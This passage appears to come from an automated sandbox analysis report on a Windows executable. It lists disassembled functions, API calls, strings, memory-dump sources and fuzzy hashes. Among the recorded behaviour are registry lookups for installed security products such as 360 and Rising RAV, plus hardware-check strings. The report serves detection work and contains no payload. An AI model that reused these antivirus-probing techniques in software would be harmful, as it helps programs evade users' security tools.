                                                                                                                                                • necessary data rewind wasn't possible, xrefs: 004BEFCD
                                                                                                                                                • ioctl callback returned error %d, xrefs: 004BEFA5
                                                                                                                                                • the ioctl callback returned %d, xrefs: 004BEF92
                                                                                                                                                • seek callback returned error %d, xrefs: 004BEF67
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _fseek
                                                                                                                                                • String ID: ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
                                                                                                                                                • API String ID: 2937370855-2561564945
                                                                                                                                                • Opcode ID: c0e459ed6d2b7e582f60591a48f00e57a49d9160d0a5ae30e75f78581dc297ac
                                                                                                                                                • Instruction ID: 2bfb2b9ef8207ceb783e17234f7e2e16af2170ef2afdf67ed3bc2180ecf2fef6
                                                                                                                                                • Opcode Fuzzy Hash: c0e459ed6d2b7e582f60591a48f00e57a49d9160d0a5ae30e75f78581dc297ac
                                                                                                                                                • Instruction Fuzzy Hash: E0113A72104705BFEB306A668CC1EFB3AD8DB81324F20083FF26981191D76D5D81A67E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041C784, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041C789
                                                                                                                                                • _memset.LIBCMT ref: 0041C7C9
                                                                                                                                                • _memset.LIBCMT ref: 0041C7E0
                                                                                                                                                  • Part of subcall function 00413EE7: _memset.LIBCMT ref: 00413F18
                                                                                                                                                  • Part of subcall function 00413EE7: GetVersionExW.KERNEL32 ref: 00413F2D
                                                                                                                                                  • Part of subcall function 0040D809: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0040D828
                                                                                                                                                  • Part of subcall function 0040D809: WideCharToMultiByte.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 0040D851
                                                                                                                                                  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
                                                                                                                                                  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
                                                                                                                                                  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$ByteCharMultiWide$ErrorFreeH_prologHeapLastVersion___sbh_find_block___sbh_free_block__lock
                                                                                                                                                • String ID: NOHARDDISK$|P
                                                                                                                                                • API String ID: 2881611377-2061113471
                                                                                                                                                • Opcode ID: 689746e5431970e9d0f70b7fca30be038c29d03e46b7a29646e55585183247d5
                                                                                                                                                • Instruction ID: cf3c418279bb831ffae1d8910e738f3479259517e5a74ac437dc2ec25b6d1683
                                                                                                                                                • Opcode Fuzzy Hash: 689746e5431970e9d0f70b7fca30be038c29d03e46b7a29646e55585183247d5
                                                                                                                                                • Instruction Fuzzy Hash: CF213DB6C4125CABCB11EF59DC85ADEBBBCEF18314F1044ABE509A3251DA385F848F94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041C4B2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041C4B7
                                                                                                                                                  • Part of subcall function 0041C2F1: RegCloseKey.ADVAPI32(00000000,00000000,0041C445,00000001,00000001,?,00000000,?,?,00404886,00000000,?,?,?,0040476B,00000001), ref: 0041C2FB
                                                                                                                                                  • Part of subcall function 0041C2F1: RegOpenKeyW.ADVAPI32(80000000,CLSID\{79B5BC47-CEA1-4772-B433-7D1B3139F278}\Implemented Categories\{607568DD-B059-434b-B7E7-38EC51998F8E},00000000), ref: 0041C314
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000001), ref: 0041C54A
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000001), ref: 0041C559
                                                                                                                                                  • Part of subcall function 0041C344: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041C36D
                                                                                                                                                  • Part of subcall function 0041C344: RegQueryValueExW.ADVAPI32(00000000,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 0041C3A2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$QueryValue$H_prologOpen
                                                                                                                                                • String ID: did$|P
                                                                                                                                                • API String ID: 3691417025-2379887820
                                                                                                                                                • Opcode ID: 0a324e95d7312b4ea8b0aead640806b29595b15ffc86379d7f402faa50bbbbd6
                                                                                                                                                • Instruction ID: daac6cd6e9e80c07107383c163861bd4f2f57223729cb29765de809be769f937
                                                                                                                                                • Opcode Fuzzy Hash: 0a324e95d7312b4ea8b0aead640806b29595b15ffc86379d7f402faa50bbbbd6
                                                                                                                                                • Instruction Fuzzy Hash: B521A531940218ABCB00AF99CC897EEBB75EF44359F10802FB511B7291C7789E84CAA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004170E5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004170F2
                                                                                                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 00417102
                                                                                                                                                • _memset.LIBCMT ref: 00417125
                                                                                                                                                • _swprintf.LIBCMT ref: 0041713E
                                                                                                                                                  • Part of subcall function 00494612: __vswprintf_s_l.LIBCMT ref: 00494625
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$CurrentSession__vswprintf_s_l_memset_swprintf
                                                                                                                                                • String ID: $SessionID
                                                                                                                                                • API String ID: 262824962-3287992559
                                                                                                                                                • Opcode ID: 27f7e8675d9d5653065055976ae9f108d721f0c8a0b1ab1248ed994308174bd0
                                                                                                                                                • Instruction ID: 5f36c9fb717402c447217728248e1a4f289adea5c0305cb6386e46845fc18e2b
                                                                                                                                                • Opcode Fuzzy Hash: 27f7e8675d9d5653065055976ae9f108d721f0c8a0b1ab1248ed994308174bd0
                                                                                                                                                • Instruction Fuzzy Hash: 78110871900218BBDB20EB62CC89EEF7B7CAF44344F00046AE505A2161D7B8DA899768
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041C40D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041C412
                                                                                                                                                  • Part of subcall function 0041C2F1: RegCloseKey.ADVAPI32(00000000,00000000,0041C445,00000001,00000001,?,00000000,?,?,00404886,00000000,?,?,?,0040476B,00000001), ref: 0041C2FB
                                                                                                                                                  • Part of subcall function 0041C2F1: RegOpenKeyW.ADVAPI32(80000000,CLSID\{79B5BC47-CEA1-4772-B433-7D1B3139F278}\Implemented Categories\{607568DD-B059-434b-B7E7-38EC51998F8E},00000000), ref: 0041C314
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000001,?,00000000,?,?,00404886,00000000,?,?,?,0040476B,00000001,00000001), ref: 0041C48C
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000001,?,00000000,?,?,00404886,00000000,?,?,?,0040476B,00000001,00000001,77E2EB70), ref: 0041C49B
                                                                                                                                                  • Part of subcall function 0041C344: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041C36D
                                                                                                                                                  • Part of subcall function 0041C344: RegQueryValueExW.ADVAPI32(00000000,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 0041C3A2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$QueryValue$H_prologOpen
                                                                                                                                                • String ID: guid$|P
                                                                                                                                                • API String ID: 3691417025-14221615
                                                                                                                                                • Opcode ID: 7d04ad43afead76f8eac61f9252d88c70b57a170bcf7a3bad00afd7295edc9d5
                                                                                                                                                • Instruction ID: 72c63756efee89f392cd083e3615c8601cd1656d6be207132b74f334aa7987e2
                                                                                                                                                • Opcode Fuzzy Hash: 7d04ad43afead76f8eac61f9252d88c70b57a170bcf7a3bad00afd7295edc9d5
                                                                                                                                                • Instruction Fuzzy Hash: EB118671940214ABCB119F95DC85BFEB774EF44355F10C02FB815B6251C7788E80CAA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0041C6DF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$H_prolog_strlen
                                                                                                                                                • String ID: NONECPU$|P
                                                                                                                                                • API String ID: 4197362399-4019201197
                                                                                                                                                • Opcode ID: 1e0c9cbd9c8bbe13f8101ffcf35ba8e8014e5f28474b5afd6a90b09dd770dcff
                                                                                                                                                • Instruction ID: 7f2005befaffd6045799e5009f2cf3ab0c2c9903552300eba690e76bf77329b5
                                                                                                                                                • Opcode Fuzzy Hash: 1e0c9cbd9c8bbe13f8101ffcf35ba8e8014e5f28474b5afd6a90b09dd770dcff
                                                                                                                                                • Instruction Fuzzy Hash: A01127B190011CABDB10EF59D986ADEB7BCEF05748F5004AEA114A3242D6789F848BA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040103F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000004,kinstalltool_{0A3C83FD-7B1D-4c3f-8932-190BA6D25F90},00000000,00401728), ref: 00401053
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040106A
                                                                                                                                                • MapViewOfFileEx.KERNEL32(?,000F001F,00000000,00000000,?,00000000), ref: 00401094
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004010AA
                                                                                                                                                Strings
                                                                                                                                                • kinstalltool_{0A3C83FD-7B1D-4c3f-8932-190BA6D25F90}, xrefs: 00401043
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                • String ID: kinstalltool_{0A3C83FD-7B1D-4c3f-8932-190BA6D25F90}
                                                                                                                                                • API String ID: 1661045500-2019610213
                                                                                                                                                • Opcode ID: 7938225936d7c4eaad28e3493393e00ac30c41ea797ecafcd04c130a4a125ce6
                                                                                                                                                • Instruction ID: 4534d90bf142621e11afcdd47ef8dd24a13c549bc5f85d9ed2eea65f47a5bb1d
                                                                                                                                                • Opcode Fuzzy Hash: 7938225936d7c4eaad28e3493393e00ac30c41ea797ecafcd04c130a4a125ce6
                                                                                                                                                • Instruction Fuzzy Hash: D301D6B16007419FD7304F3AEC08D27BEF9EBC1B113248A3EF296D2AA5DB359481D625
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004124B0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 004124B5
                                                                                                                                                  • Part of subcall function 0041131B: RegCloseKey.ADVAPI32(00000001,00000000,004124EF,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360,00000001,00000010,00000000,?,?,004123A0,?), ref: 00411325
                                                                                                                                                  • Part of subcall function 0041131B: RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00411337
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360,00000001,00000010,00000000,?,?,004123A0,?), ref: 0041251C
                                                                                                                                                  • Part of subcall function 0041134A: RegQueryValueExW.ADVAPI32(00000000,004123A0,00000000,004123A0,00000000,?,00000000,?,004123A0,?), ref: 00411373
                                                                                                                                                  • Part of subcall function 0041134A: RegQueryValueExW.ADVAPI32(?,00000001,00000000,00000001,00000000,?,?,?), ref: 004113A8
                                                                                                                                                  • Part of subcall function 00411460: __EH_prolog.LIBCMT ref: 00411465
                                                                                                                                                Strings
                                                                                                                                                • InstallLocation, xrefs: 004124F4
                                                                                                                                                • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360, xrefs: 004124DF
                                                                                                                                                • |P, xrefs: 004124C7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseH_prologQueryValue$Open
                                                                                                                                                • String ID: InstallLocation$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360$|P
                                                                                                                                                • API String ID: 2132191456-2110655369
                                                                                                                                                • Opcode ID: 2421d9b0af766796b78481f562871010e4be39d0225d3ac369f90baab30e3769
                                                                                                                                                • Instruction ID: 5d0ffb722ef327f411fc1abfd5a1774ccf5443c6ba7cc9efedbed90ebec969e4
                                                                                                                                                • Opcode Fuzzy Hash: 2421d9b0af766796b78481f562871010e4be39d0225d3ac369f90baab30e3769
                                                                                                                                                • Instruction Fuzzy Hash: BF015275A00218AEDB10DFA6D985BAEB7B5EF44748F10443FA511F3291C7B88E40CA54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004127EF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 004127F4
                                                                                                                                                  • Part of subcall function 0041131B: RegCloseKey.ADVAPI32(00000001,00000000,004124EF,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360,00000001,00000010,00000000,?,?,004123A0,?), ref: 00411325
                                                                                                                                                  • Part of subcall function 0041131B: RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00411337
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,SOFTWARE\rising\RAV,00000000,004FC0BC,00000000,?,?,0041275A,004FDA04), ref: 0041285B
                                                                                                                                                  • Part of subcall function 0041134A: RegQueryValueExW.ADVAPI32(00000000,004123A0,00000000,004123A0,00000000,?,00000000,?,004123A0,?), ref: 00411373
                                                                                                                                                  • Part of subcall function 0041134A: RegQueryValueExW.ADVAPI32(?,00000001,00000000,00000001,00000000,?,?,?), ref: 004113A8
                                                                                                                                                  • Part of subcall function 00411460: __EH_prolog.LIBCMT ref: 00411465
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseH_prologQueryValue$Open
                                                                                                                                                • String ID: SOFTWARE\rising\RAV$installpath$|P
                                                                                                                                                • API String ID: 2132191456-2056135755
                                                                                                                                                • Opcode ID: e1056f18951c662493af21d6bf02fff146b17d0f5c6e91da0990a79860842ddb
                                                                                                                                                • Instruction ID: 9d7070764ca2f926924e9fc70ea091814b8af889e217cf7e8c7dd790c1051848
                                                                                                                                                • Opcode Fuzzy Hash: e1056f18951c662493af21d6bf02fff146b17d0f5c6e91da0990a79860842ddb
                                                                                                                                                • Instruction Fuzzy Hash: 8A015271E002199EDB00EF9AC985BAEB7B4FF44755F10453FA915F3251C7B84E41CA54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0048E466, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __lock.LIBCMT ref: 0048E484
                                                                                                                                                  • Part of subcall function 00499E3B: __mtinitlocknum.LIBCMT ref: 00499E4F
                                                                                                                                                  • Part of subcall function 00499E3B: __amsg_exit.LIBCMT ref: 00499E5B
                                                                                                                                                  • Part of subcall function 00499E3B: EnterCriticalSection.KERNEL32(?,?,?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 00499E63
                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 0048E48F
                                                                                                                                                • ___sbh_free_block.LIBCMT ref: 0048E49E
                                                                                                                                                • HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
                                                                                                                                                • GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2714421763-0
                                                                                                                                                • Opcode ID: e50029bad8b597c017010720c07fe66b71ac0cdc606b605e4307d116484fe6b1
                                                                                                                                                • Instruction ID: c5c5381865119a084fa91d96abcddb2d2a7d9fc74ed70467104da45f6ed01fbb
                                                                                                                                                • Opcode Fuzzy Hash: e50029bad8b597c017010720c07fe66b71ac0cdc606b605e4307d116484fe6b1
                                                                                                                                                • Instruction Fuzzy Hash: 4E014F71900216AADF30BFB79D0AB5E3AA49F00B28F14896FF508A61D1DA3D89409B5D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00408887, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 421COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040888C
                                                                                                                                                  • Part of subcall function 004092DC: __EH_prolog.LIBCMT ref: 004092E1
                                                                                                                                                  • Part of subcall function 004092DC: std::_Lockit::_Lockit.LIBCPMT ref: 004092EF
                                                                                                                                                  • Part of subcall function 004092DC: int.LIBCPMT ref: 00409303
                                                                                                                                                  • Part of subcall function 004092DC: std::locale::_Getfacet.LIBCPMT ref: 0040930C
                                                                                                                                                  • Part of subcall function 0040A189: std::locale::facet::_Decref.LIBCPMT ref: 0040A18F
                                                                                                                                                • _localeconv.LIBCMT ref: 0040890B
                                                                                                                                                • _strcspn.LIBCMT ref: 00408A11
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$DecrefGetfacetLockitLockit::__localeconv_strcspnstd::_std::locale::_std::locale::facet::_
                                                                                                                                                • String ID: e
                                                                                                                                                • API String ID: 4086212889-4024072794
